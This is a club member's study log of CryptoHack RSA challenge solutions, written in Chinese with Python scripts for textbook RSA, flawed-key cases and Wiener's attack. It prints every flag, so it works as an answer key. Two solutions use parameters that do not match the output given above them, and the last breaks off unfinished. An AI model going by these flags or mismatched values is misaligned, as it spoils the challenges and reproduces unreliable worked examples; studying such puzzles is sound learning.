皮蛋厂的学习日记系列为山东警察学院网安社成员日常学习分享,希望能与大家共同学习、共同进步~
-
2020级 Newiy_Gnaw CRYPTOHACK RSA 刷题记录
-
STARTER
-
Primes Part 1
-
PUBLIC EXPONENT
-
2021级田睿敏 | 骰子进阶
CRYPTO
2020级 Newiy_Gnaw CRYPTOHACK RSA 刷题记录
STARTER
RSA STARTER 1
Find the solution to
101^17 mod 22663
print(pow(101,17,22663))
#19906
RSA STARTER 2
"Encrypt" the number
12
using the exponent
e = 65537
and the primes
p = 17
and
q = 23
. What number do you get as the ciphertext?
N=p*q=391
print(pow(12,65537,391))
#301
RSA STARTER 3
Given
N = p*q
and two primes:
p = 857504083339712752489993810777
q = 1029224947942998075080348647219
What is the totient(欧拉函数) of
N
?
p = 857504083339712752489993810777
q = 1029224947942998075080348647219
phi = ( p - 1) * ( q - 1 )
print(phi)
#882564595536224140639625987657529300394956519977044270821168
RSA STARTER 4
Given the two primes:
p = 857504083339712752489993810777
q = 1029224947942998075080348647219
and the exponent:
e = 65537
What is the private key d?
#E、D满足以下关系:(E * D) mod φ(N) = 1
import gmpy2
p = 857504083339712752489993810777
q = 1029224947942998075080348647219
e=65537
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
print(d)
# 121832886702415731577073962957377780195510499965398469843281
RSA STARTER 5
I've encrypted a secret number for your eyes only using your public key parameters:
N = 882564595536224140639625987659416029426239230804614613279163
e = 65537
Use the private key that you found for these parameters in the previous challenge to decrypt this ciphertext:
c = 77578995801157823671636298847186723593814843845525223303932
解题:
分解N,用大素数分解网站http://www.factordb.com/分解
p= 857504083339712752489993810777
q= 1029224947942998075080348647219
#m=c^d mod N
import gmpy2
c=77578995801157823671636298847186723593814843845525223303932
e = 65537
N = 882564595536224140639625987659416029426239230804614613279163
p= 857504083339712752489993810777
q= 1029224947942998075080348647219
phi=(p-1)*(q-1)
d=gmpy2.invert(e,phi)
print(pow(c,d,N))
#13371337
RSA STARTER 6
Your friend can decrypt the message using their private key :
m = Cd0 mod N0
. Using your public key they calculate
s = Se1 mod N1
.
Now by computing
H(m)
and comparing it to
s
:
assert H(m) == s
, they can ensure that the message you sent them, is the message that they received!
Sign the flag
crypto{Immut4ble_m3ssag1ng}
using your private key and the SHA256 hash function.
A nice application of RSA, but still nice and straightforward to implement:
private_0a1880d1fffce9403686130a1f932b10.key:
N = 15216583654836731327639981224133918855895948374072384050848479908982286890731769486609085918857664046075375253168955058743185664390273058074450390236774324903305663479046566232967297765731625328029814055635316002591227570271271445226094919864475407884459980489638001092788574811554149774028950310695112688723853763743238753349782508121985338746755237819373178699343135091783992299561827389745132880022259873387524273298850340648779897909381979714026837172003953221052431217940632552930880000919436507245150726543040714721553361063311954285289857582079880295199632757829525723874753306371990452491305564061051059885803
d = 11175901210643014262548222473449533091378848269490518850474399681690547281665059317155831692300453197335735728459259392366823302405685389586883670043744683993709123180805154631088513521456979317628012721881537154107239389466063136007337120599915456659758559300673444689263854921332185562706707573660658164991098457874495054854491474065039621922972671588299315846306069845169959451250821044417886630346229021305410340100401530146135418806544340908355106582089082980533651095594192031411679866134256418292249592135441145384466261279428795408721990564658703903787956958168449841491667690491585550160457893350536334242689
解题:
from hashlib import sha256
N=15216583654836731327639981224133918855895948374072384050848479908982286890731769486609085918857664046075375253168955058743185664390273058074450390236774324903305663479046566232967297765731625328029814055635316002591227570271271445226094919864475407884459980489638001092788574811554149774028950310695112688723853763743238753349782508121985338746755237819373178699343135091783992299561827389745132880022259873387524273298850340648779897909381979714026837172003953221052431217940632552930880000919436507245150726543040714721553361063311954285289857582079880295199632757829525723874753306371990452491305564061051059885803
d=11175901210643014262548222473449533091378848269490518850474399681690547281665059317155831692300453197335735728459259392366823302405685389586883670043744683993709123180805154631088513521456979317628012721881537154107239389466063136007337120599915456659758559300673444689263854921332185562706707573660658164991098457874495054854491474065039621922972671588299315846306069845169959451250821044417886630346229021305410340100401530146135418806544340908355106582089082980533651095594192031411679866134256418292249592135441145384466261279428795408721990564658703903787956958168449841491667690491585550160457893350536334242689
flag="crypto{Immut4ble_m3ssag1ng}"
flag=flag.encode("gb2312")
h=sha256(flag)
h=h.hexdigest() #解密
c=pow(int(h,16),d,N)
print(hex(c))
#0x6ac9bb8f110b318a40ad8d7e57defdcce2652f5928b5f9b97c1504d7096d7af1d34e477b30f1a08014e8d525b14458b709a77a5fa67d4711bd19da1446f9fb0ffd9fdedc4101bdc9a4b26dd036f11d02f6b56f4926170c643f302d59c4fe8ea678b3ca91b4bb9b2024f2a839bec1514c0242b57e1f5e77999ee67c450982730252bc2c3c35acb4ac06a6ce8b9dbf84e29df0baa7369e0fd26f6dfcfb22a464e05c5b72baba8f78dc742e96542169710918ee2947749477869cb3567180ccbdfe6fdbe85bcaca4bf6da77c8f382bb4c8cd56dee43d1290ca856318c97f1756b789e3cac0c9738f5e9f797314d39a2ededb92583d97124ec6b313c4ea3464037d3(提交时不带前面的0x)
**Primes Part 1 **
**Factoring **
Factorise the 150-bit number
510143758735509025530880200653196460532653147
into its two constituent primes. Give the smaller one as your answer.
大素数分解网站 http://www.factordb.com/
p=19704762736204164635843
q=25889363174021185185929
**Inferius Prime **
inferius.py
#!/usr/bin/env python3
from Crypto.Util.number import getPrime, inverse, bytes_to_long, long_to_bytes, GCD
e = 3
# n will be 8 * (100 + 100) = 1600 bits strong which is pretty good
while True:
p = getPrime(100) #得到一个质数
q = getPrime(100)
phi = (p - 1) * (q - 1)
d = inverse(e, phi) #模逆运算
if d != -1 and GCD(e, phi) == 1: #gcd最大公约数
break
n = p * q
flag = b"XXXXXXXXXXXXXXXXXXXXXXX"
pt = bytes_to_long(flag)
ct = pow(pt, e, n)
print(f"n = {n}")
print(f"e = {e}")
print(f"ct = {ct}")
pt = pow(ct, d, n)
decrypted = long_to_bytes(pt)
assert decrypted == flag
output.txt
n = 975325272551112052224579086426779937864583196930415549901547
e = 3
ct = 530330160463104811924631297357472527912593054478669739211775
题解:
import gmpy2
from Crypto.Util.number import inverse,long_to_bytes
n = 742449129124467073921545687640895127535705902454369756401331
p = 752708788837165590355094155871
q = 986369682585281993933185289261
e = 3
ct = 39207274348578481322317340648475596807303160111338236677373
phi=(p-1)*(q-1)
d=inverse(e,phi)
m=pow(ct,d,n)
print(long_to_bytes(m))
# crypto{N33d_b1g_pR1m35}
**Monoprime **
#mono前缀为单个的意思
Why is everyone so obsessed with multiplying two primes for RSA. Why not just use one?
output.txt:
n = 171731371218065444125482536302245915415603318380280392385291836472299752747934607246477508507827284075763910264995326010251268493630501989810855418416643352631102434317900028697993224868629935657273062472544675693365930943308086634291936846505861203914449338007760990051788980485462592823446469606824421932591
e = 65537
ct = 161367550346730604451454756189028938964941280347662098798775466019463375610700074840105776873791605070092554650190486030367121011578171525759600774739890458414593857709994072516290998135846956596662071379067305011746842247628316996977338024343628757374524136260758515864509435302781735938531030576289086798942
题解:
n为质数只分解出一个因子:
p=q=n本身=171731371218065444125482536302245915415603318380280392385291836472299752747934607246477508507827284075763910264995326010251268493630501989810855418416643352631102434317900028697993224868629935657273062472544675693365930943308086634291936846505861203914449338007760990051788980485462592823446469606824421932591
解题脚本:
from Crypto.Util.number import inverse,long_to_bytes
n = 171731371218065444125482536302245915415603318380280392385291836472299752747934607246477508507827284075763910264995326010251268493630501989810855418416643352631102434317900028697993224868629935657273062472544675693365930943308086634291936846505861203914449338007760990051788980485462592823446469606824421932591
e = 65537
ct = 161367550346730604451454756189028938964941280347662098798775466019463375610700074840105776873791605070092554650190486030367121011578171525759600774739890458414593857709994072516290998135846956596662071379067305011746842247628316996977338024343628757374524136260758515864509435302781735938531030576289086798942
phi=n-1
d=inverse(e,phi)
print(long_to_bytes(pow(ct,d,n)))
#crypto{0n3_pr1m3_41n7_pr1m3_l0l}
Square Eyes
It was taking forever to get a 2048 bit prime, so I just generated one and used it twice.
If you're stuck, look again at the formula for Euler's totient.
output.txt:
N = 535860808044009550029177135708168016201451343147313565371014459027743491739422885443084705720731409713775527993719682583669164873806842043288439828071789970694759080842162253955259590552283047728782812946845160334801782088068154453021936721710269050985805054692096738777321796153384024897615594493453068138341203673749514094546000253631902991617197847584519694152122765406982133526594928685232381934742152195861380221224370858128736975959176861651044370378539093990198336298572944512738570839396588590096813217791191895941380464803377602779240663133834952329316862399581950590588006371221334128215409197603236942597674756728212232134056562716399155080108881105952768189193728827484667349378091100068224404684701674782399200373192433062767622841264055426035349769018117299620554803902490432339600566432246795818167460916180647394169157647245603555692735630862148715428791242764799469896924753470539857080767170052783918273180304835318388177089674231640910337743789750979216202573226794240332797892868276309400253925932223895530714169648116569013581643192341931800785254715083294526325980247219218364118877864892068185905587410977152737936310734712276956663192182487672474651103240004173381041237906849437490609652395748868434296753449
e = 65537
c = 222502885974182429500948389840563415291534726891354573907329512556439632810921927905220486727807436668035929302442754225952786602492250448020341217733646472982286222338860566076161977786095675944552232391481278782019346283900959677167026636830252067048759720251671811058647569724495547940966885025629807079171218371644528053562232396674283745310132242492367274184667845174514466834132589971388067076980563188513333661165819462428837210575342101036356974189393390097403614434491507672459254969638032776897417674577487775755539964915035731988499983726435005007850876000232292458554577437739427313453671492956668188219600633325930981748162455965093222648173134777571527681591366164711307355510889316052064146089646772869610726671696699221157985834325663661400034831442431209123478778078255846830522226390964119818784903330200488705212765569163495571851459355520398928214206285080883954881888668509262455490889283862560453598662919522224935145694435885396500780651530829377030371611921181207362217397805303962112100190783763061909945889717878397740711340114311597934724670601992737526668932871436226135393872881664511222789565256059138002651403875484920711316522536260604255269532161594824301047729082877262812899724246757871448545439896
这道题的核心在于只有一个prime number!
如果一般的套路为 phi = (p-1)*(q-1)的话
在这种情况就是 phi = p*(p-1)
from Crypto.Util.number import *
N=535860808044009550029177135708168016201451343147313565371014459027743491739422885443084705720731409713775527993719682583669164873806842043288439828071789970694759080842162253955259590552283047728782812946845160334801782088068154453021936721710269050985805054692096738777321796153384024897615594493453068138341203673749514094546000253631902991617197847584519694152122765406982133526594928685232381934742152195861380221224370858128736975959176861651044370378539093990198336298572944512738570839396588590096813217791191895941380464803377602779240663133834952329316862399581950590588006371221334128215409197603236942597674756728212232134056562716399155080108881105952768189193728827484667349378091100068224404684701674782399200373192433062767622841264055426035349769018117299620554803902490432339600566432246795818167460916180647394169157647245603555692735630862148715428791242764799469896924753470539857080767170052783918273180304835318388177089674231640910337743789750979216202573226794240332797892868276309400253925932223895530714169648116569013581643192341931800785254715083294526325980247219218364118877864892068185905587410977152737936310734712276956663192182487672474651103240004173381041237906849437490609652395748868434296753449
e = 65537
c=222502885974182429500948389840563415291534726891354573907329512556439632810921927905220486727807436668035929302442754225952786602492250448020341217733646472982286222338860566076161977786095675944552232391481278782019346283900959677167026636830252067048759720251671811058647569724495547940966885025629807079171218371644528053562232396674283745310132242492367274184667845174514466834132589971388067076980563188513333661165819462428837210575342101036356974189393390097403614434491507672459254969638032776897417674577487775755539964915035731988499983726435005007850876000232292458554577437739427313453671492956668188219600633325930981748162455965093222648173134777571527681591366164711307355510889316052064146089646772869610726671696699221157985834325663661400034831442431209123478778078255846830522226390964119818784903330200488705212765569163495571851459355520398928214206285080883954881888668509262455490889283862560453598662919522224935145694435885396500780651530829377030371611921181207362217397805303962112100190783763061909945889717878397740711340114311597934724670601992737526668932871436226135393872881664511222789565256059138002651403875484920711316522536260604255269532161594824301047729082877262812899724246757871448545439896
p=23148667521998097720857168827790771337662483716348435477360567409355026169165934446949809664595523770853897203103759106983985113264049057416908191166720008503275951625738975666019029172377653170602440373579593292576530667773951407647222757756437867216095193174201323278896027294517792607881861855264600525772460745259440301156930943255240915685718552334192230264780355799179037816026330705422484000086542362084006958158550346395941862383925942033730030004606360308379776255436206440529441711859246811586652746028418496020145441513037535475380962562108920699929022900677901988508936509354385660735694568216631382653107
phi=p*(p-1) #这道题的核心
d=inverse(e,phi)
m=pow(c,d,N)
print(hex(m))
#0x63727970746f7b7371756172335f723030745f69355f6634737433725f7468346e5f663463743072316e67217d
#crypto{squar3_r00t_i5_f4st3r_th4n_f4ct0r1ng!}
**Manyprime **
Using one prime factor was definitely a bad idea so I'll try using over 30 instead.
If it's taking forever to factorise, read up on factorisation algorithms and make sure you're using one that's optimised for this scenario.
output.txt:
n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637
e = 65537
ct = 320721490534624434149993723527322977960556510750628354856260732098109692581338409999983376131354918370047625150454728718467998870322344980985635149656977787964380651868131740312053755501594999166365821315043312308622388016666802478485476059625888033017198083472976011719998333985531756978678758897472845358167730221506573817798467100023754709109274265835201757369829744113233607359526441007577850111228850004361838028842815813724076511058179239339760639518034583306154826603816927757236549096339501503316601078891287408682099750164720032975016814187899399273719181407940397071512493967454225665490162619270814464
题解:
n共能分解出32个因数
from Crypto.Util.number import inverse,long_to_bytes
import gmpy2
n = 580642391898843192929563856870897799650883152718761762932292482252152591279871421569162037190419036435041797739880389529593674485555792234900969402019055601781662044515999210032698275981631376651117318677368742867687180140048715627160641771118040372573575479330830092989800730105573700557717146251860588802509310534792310748898504394966263819959963273509119791037525504422606634640173277598774814099540555569257179715908642917355365791447508751401889724095964924513196281345665480688029639999472649549163147599540142367575413885729653166517595719991872223011969856259344396899748662101941230745601719730556631637
e = 65537
ct = 320721490534624434149993723527322977960556510750628354856260732098109692581338409999983376131354918370047625150454728718467998870322344980985635149656977787964380651868131740312053755501594999166365821315043312308622388016666802478485476059625888033017198083472976011719998333985531756978678758897472845358167730221506573817798467100023754709109274265835201757369829744113233607359526441007577850111228850004361838028842815813724076511058179239339760639518034583306154826603816927757236549096339501503316601078891287408682099750164720032975016814187899399273719181407940397071512493967454225665490162619270814464
factors=[13099895578757581201,16656402470578844539,12132158321859677597,14963354250199553339,12834461276877415051,14278240802299816541, 14178869592193599187, 11492065299277279799, 10336650220878499841, 12955403765595949597, 10638241655447339831, 11403460639036243901, 12973972336777979701, 14100640260554622013, 11665347949879312361, 11328768673634243077,9303850685953812323, 11530534813954192171, 15998365463074268941, 13572286589428162097, 11282698189561966721, 9389357739583927789, 15824122791679574573, 17281246625998849649, 15669758663523555763, 14523070016044624039, 17138336856793050757, 11473665579512371723,9282105380008121879, 16898740504023346457, 15364597561881860737, 17174065872156629921]
phi=1
for x in factors:
phi *= (x-1)
d = gmpy2.invert(e, phi)
print(long_to_bytes(pow(ct, d, n)))
#crypto{700_m4ny_5m4ll_f4c70r5}
PUBLIC EXPONENT
Salty
Smallest exponent(指数,幂) should be fastest, right?
salty.py:
output.txt:
n = 110581795715958566206600392161360212579669637391437097703685154237017351570464767725324182051199901920318211290404777259728923614917211291562555864753005179326101890427669819834642007924406862482343614488768256951616086287044725034412802176312273081322195866046098595306261781788276570920467840172004530873767
e = 1
ct = 44981230718212183604274785925793145442655465025264554046028251311164494127485
题解:
from Crypto.Util.number import inverse,long_to_bytes
n = 110581795715958566206600392161360212579669637391437097703685154237017351570464767725324182051199901920318211290404777259728923614917211291562555864753005179326101890427669819834642007924406862482343614488768256951616086287044725034412802176312273081322195866046098595306261781788276570920467840172004530873767
e = 1
ct = 44981230718212183604274785925793145442655465025264554046028251311164494127485
print(long_to_bytes(ct))
#crypto{saltstack_fell_for_this!}
Modulus Inutilis
My primes should be more than large enough now!
source.py:
output.txt:
n = 17258212916191948536348548470938004244269544560039009244721959293554822498047075403658429865201816363311805874117705688359853941515579440852166618074161313773416434156467811969628473425365608002907061241714688204565170146117869742910273064909154666642642308154422770994836108669814632309362483307560217924183202838588431342622551598499747369771295105890359290073146330677383341121242366368309126850094371525078749496850520075015636716490087482193603562501577348571256210991732071282478547626856068209192987351212490642903450263288650415552403935705444809043563866466823492258216747445926536608548665086042098252335883
e = 3
ct = 243251053617903760309941844835411292373350655973075480264001352919865180151222189820473358411037759381328642957324889519192337152355302808400638052620580409813222660643570085177957
题解:
from Crypto.Util.number import long_to_bytes
from gmpy2 import iroot
n = 17258212916191948536348548470938004244269544560039009244721959293554822498047075403658429865201816363311805874117705688359853941515579440852166618074161313773416434156467811969628473425365608002907061241714688204565170146117869742910273064909154666642642308154422770994836108669814632309362483307560217924183202838588431342622551598499747369771295105890359290073146330677383341121242366368309126850094371525078749496850520075015636716490087482193603562501577348571256210991732071282478547626856068209192987351212490642903450263288650415552403935705444809043563866466823492258216747445926536608548665086042098252335883
e = 3
ct = 243251053617903760309941844835411292373350655973075480264001352919865180151222189820473358411037759381328642957324889519192337152355302808400638052620580409813222660643570085177957
print(long_to_bytes(iroot(ct,3)[0])) #gmpy2.iroot(x,n) x开n次根
#crypto{N33d_m04R_p4dd1ng}
**Everything is Big **
We have a supercomputer at work, so I've made sure my encryption is secure by picking massive numbers!
source .py:
#!/usr/bin/env python3
from Crypto.Util.number import getPrime, bytes_to_long, inverse
from random import getrandbits
from math import gcd
FLAG = b"crypto{?????????????????????????}"
m = bytes_to_long(FLAG)
def get_huge_RSA():
p = getPrime(1024)
q = getPrime(1024)
N = p*q
phi = (p-1)*(q-1)
while True:
e = getrandbits(2048)
if gcd(e,phi) == 1:
break
return N,e
N, e = get_huge_RSA()
c = pow(m, e, N)
print(f'N = {hex(N)}')
print(f'e = {hex(e)}')
print(f'c = {hex(c)}')
output.txt:
N = 0x8da7d2ec7bf9b322a539afb9962d4d2ebeb3e3d449d709b80a51dc680a14c87ffa863edfc7b5a2a542a0fa610febe2d967b58ae714c46a6eccb44cd5c90d1cf5e271224aa3367e5a13305f2744e2e56059b17bf520c95d521d34fdad3b0c12e7821a3169aa900c711e6923ca1a26c71fc5ac8a9ff8c878164e2434c724b68b508a030f86211c1307b6f90c0cd489a27fdc5e6190f6193447e0441a49edde165cf6074994ea260a21ea1fc7e2dfb038df437f02b9ddb7b5244a9620c8eca858865e83bab3413135e76a54ee718f4e431c29d3cb6e353a75d74f831bed2cc7bdce553f25b617b3bdd9ef901e249e43545c91b0cd8798b27804d61926e317a2b745
e = 0x86d357db4e1b60a2e9f9f25e2db15204c820b6e8d8d04d29db168c890bc8a6c1e31b9316c9680174e128515a00256b775a1a8ccca9c6936f1b4c2298c03032cda4dd8eca1145828d31466bf56bfcf0c6a8b4a1b2fb27de7a57fae7430048d7590734b2f05b6443ad60d89606802409d2fa4c6767ad42bffae01a8ef1364418362e133fa7b2770af64a68ad50ad8d2bd5cebb99ceb13368fb31a6e7503e753f8638e21a96af1b6498c18578ba89b98d70fa482ad137d28fe701b4b77baa25d5e84c81b26ee9bddf8cbb51a071c60dd57714de379cd4bc14932809ba18524a0a18e4133665cfc46e2c4fcfbc28e0a0957e5513a7307c422b87a6182d0b6a074b4d
c = 0x6a2f2e401a54eeb5dab1e6d5d80e92a6ca189049e22844c825012b8f0578f95b269b19644c7c8af3d544840d380ed75fdf86844aa8976622fa0501eaec0e5a1a5ab09d3d1037e55501c4e270060470c9f4019ced6c4e67673843daf2fd71c64f3dd8939ae322f2b79d283b3382052d076ebe9bb50b0042f1f7dd7beadf0f5686926ade9fc8370283ead781a21896e7a878d99e77c3bb1f470401062c0e0327fd85da1cf12901635f1df310e8f8c7d87aff5a01dbbecd739cd8f36462060d0eb237af8d613e2d9cebb67d612bcfc353ef2cd44b7ac85e471287eb04ae9b388b66ea8eb32429ae96dba5da8206894fa8c58a7440a127fceb5717a2eaa3c29f25f7
题解:
这道题的关键在于e的值非常大,自然d的值就非常小
解题思路:利用 Wiener''
s Attack
from __future__ import print_function
import libnum
def continued_fractions_expansion(numerator,denominator):#(e,N)
result=[]
divident = numerator % denominator
quotient = numerator //denominator
result.append(quotient)
while divident != 0:
numerator = numerator - quotient * denominator
tmp = denominator
denominator = numerator
numerator = tmp
divident = numerator % denominator
quotient = numerator //denominator
result.append(quotient)
return result
def convergents(expansion):
convergents=[(expansion[0], 1)]
for i in range(1, len(expansion)):
numerator = 1
denominator = expansion[i]
for j in range(i - 1, -1, -1):
numerator += expansion[j] * denominator
if j==0:
break
tmp = denominator
denominator = numerator
numerator = tmp
convergents.append((numerator, denominator)) #(k,d)
return convergents
def newtonSqrt(n):
approx = n // 2
better = (approx + n //approx) // 2
while better != approx:
approx = better
better = (approx + n // approx) // 2
return approx
def wiener_attack(cons, e, N):
for cs in cons:
k,d = cs
if k == 0:
continue
phi_N = (e * d - 1) // k
#x**2 - ((N - phi_N) + 1) * x + N = 0
a = 1
b = -((N - phi_N) + 1)
c = N
delta = b * b - 4 * a * c
if delta <= 0:
continue
x1 = (newtonSqrt(delta) - b)//(2 * a)
x2 = -(newtonSqrt(delta) + b)//(2 * a)
if x1 * x2 == N:
return [x1, x2, k, d]
if __name__ == "__main__":
n=17882358060039339138898609438175411871477799918608830364502878294884428124352650304487222941488283375369504964489843886450079011111185462712713723967554860800590884830066000037099382469037854558513800884226033482024813889617119261578740186832726330482660558112299636890899520011220715934812750994601701551700102743698011384901217438912042452845551043076325218096704501728676598844462217580321136090473356372587847867144139594128211568185994035330415437804541731112709398826340193004240100025524738143760028319395043726883002837253849402330482885844810147036036336331435599614615503162626162367298458471506712461489989
e=17020150076709128119083974734794181027444082538984561213457316385002227057046434624926585749829752528593484562619943378254221611402273789707344641621909587301235354100329524707868740634136536090426674571043575143643509588206167467975358621913734029724621239906525138080313643641583879006750707195361675041612917976706071422871623836736573031684273386527347331538106636557760592110474555054035119652704752522351493705235389689571190594575425975884359690828537582335216844791552006182660195930518013924320699666032058521436148104535591298587644016501482651965898477498665383282100884936846002622549396978211338460810061
c=13404525979748126097473495174813420602872447183137163515874424800745908465888610753614424273646556867230585716334041302414788296235957551537280962982606872739790238283352083341665600695265159866398615606445940999707112115592530367490262243190990792817478038440051246574063866414124249543246249381067426279737022156185945505900370286034722108244980586354993277510391977307681865198470046687594466202504536527770949973532056924243655648076079280163940372194706002378540202338409029918853268685707742216040130263591527267967132601287257674155827540831619548675943049297472561270988595335043005828140324687252672722445815
expansion = continued_fractions_expansion(e, n)
cons = convergents(expansion)
p, q, k, d = wiener_attack(cons, e, n)
m = pow(c, d, n)
print(libnum.n2s(m))
#crypto{s0m3th1ng5_c4n_b3_t00_b1g}
**Crossed Wires **
I asked my friends to encrypt our secret flag before sending it to me, but instead of using my key, they've all used their own! Can you help?
source.py:
from Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long, inverse
import math
from gmpy2 import next_prime
FLAG = b"crypto{????????????????????????????????????????????????}"
p = getPrime(1024)
q = getPrime(1024)
N = p*q
phi = (p-1)*(q-1)
e = 0x10001
d = inverse(e, phi)
my_key = (N, d)
friends = 5
friend_keys = [(N, getPrime(17)) for _ in range(friends)]
cipher = bytes_to_long(FLAG)
for key in friend_keys:
cipher = pow(cipher, key[1], key[0])
print(f"My private key: {my_key}")
print(f"My Friend's public keys: {friend_keys}")
print(f"Encrypted flag: {cipher}")
output.txt:
My private key: (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 2734411677251148030723138005716109733838866545375527602018255159319631026653190783670493107936401603981429171880504360560494771017246468702902647370954220312452541342858747590576273775107870450853533717116684326976263006435733382045807971890762018747729574021057430331778033982359184838159747331236538501849965329264774927607570410347019418407451937875684373454982306923178403161216817237890962651214718831954215200637651103907209347900857824722653217179548148145687181377220544864521808230122730967452981435355334932104265488075777638608041325256776275200067541533022527964743478554948792578057708522350812154888097)
My Friend's public keys: [(21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 106979), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 108533), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 69557), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 97117), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 103231)]
Encrypted flag: 20304610279578186738172766224224793119885071262464464448863461184092225736054747976985179673905441502689126216282897704508745403799054734121583968853999791604281615154100736259131453424385364324630229671185343778172807262640709301838274824603101692485662726226902121105591137437331463201881264245562214012160875177167442010952439360623396658974413900469093836794752270399520074596329058725874834082188697377597949405779039139194196065364426213208345461407030771089787529200057105746584493554722790592530472869581310117300343461207750821737840042745530876391793484035024644475535353227851321505537398888106855012746117
解题重点在于利用多重key去加密原文
解题:
from Crypto.Util.number import *
e = 0x10001
N = 21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771
d = 2734411677251148030723138005716109733838866545375527602018255159319631026653190783670493107936401603981429171880504360560494771017246468702902647370954220312452541342858747590576273775107870450853533717116684326976263006435733382045807971890762018747729574021057430331778033982359184838159747331236538501849965329264774927607570410347019418407451937875684373454982306923178403161216817237890962651214718831954215200637651103907209347900857824722653217179548148145687181377220544864521808230122730967452981435355334932104265488075777638608041325256776275200067541533022527964743478554948792578057708522350812154888097
friend_keys = [(21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 106979), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 108533), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 69557), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 97117), (21711308225346315542706844618441565741046498277716979943478360598053144971379956916575370343448988601905854572029635846626259487297950305231661109855854947494209135205589258643517961521594924368498672064293208230802441077390193682958095111922082677813175804775628884377724377647428385841831277059274172982280545237765559969228707506857561215268491024097063920337721783673060530181637161577401589126558556182546896783307370517275046522704047385786111489447064794210010802761708615907245523492585896286374996088089317826162798278528296206977900274431829829206103227171839270887476436899494428371323874689055690729986771, 103231)]
